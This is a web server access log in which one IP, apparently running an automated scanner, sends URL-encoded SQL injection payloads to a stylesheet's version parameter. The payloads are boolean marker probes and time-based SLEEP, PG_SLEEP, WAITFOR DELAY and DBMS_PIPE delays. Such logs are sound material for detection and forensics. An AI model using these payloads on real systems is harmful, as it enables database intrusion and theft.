194.165.17.17 - - [02/Oct/2022:01:40:21 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=%28SELECT%20CONCAT%280x7176627171%2C%28SELECT%20%28ELT%289837%3D9837%2C1%29%29%29%2C0x716a706b71%29%29 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:22 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=%28SELECT%20%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286978%3D6978%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%29 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:23 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=%28SELECT%20CHAR%28113%29%2BCHAR%28118%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%288702%3D8702%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28113%29%29 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:24 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%29%3BSELECT%20SLEEP%285%29%23 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:24 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%3BSELECT%20SLEEP%285%29%23 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:24 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%29%3BSELECT%20SLEEP%285%29%23 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:25 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%3BSELECT%20SLEEP%285%29%23 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:25 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%25%27%3BSELECT%20SLEEP%285%29%23 HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:26 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%29%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:26 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:27 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%29%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:28 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:28 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%25%27%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:29 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:29 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:30 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:30 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:31 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%25%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:31 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28110%29%7C%7CCHR%2872%29%7C%7CCHR%28113%29%7C%7CCHR%2866%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 200 4895
172.22.2.4 - - [02/Oct/2022:01:38:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57375
194.165.17.17 - - [02/Oct/2022:01:40:31 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28110%29%7C%7CCHR%2872%29%7C%7CCHR%28113%29%7C%7CCHR%2866%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:32 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28110%29%7C%7CCHR%2872%29%7C%7CCHR%28113%29%7C%7CCHR%2866%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:32 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%27%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28110%29%7C%7CCHR%2872%29%7C%7CCHR%28113%29%7C%7CCHR%2866%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 200 4895
194.165.17.17 - - [02/Oct/2022:01:40:33 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5%25%27%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28110%29%7C%7CCHR%2872%29%7C%7CCHR%28113%29%7C%7CCHR%2866%29%2C5%29%20FROM%20DUAL-- HTTP/1.1" 200 4895
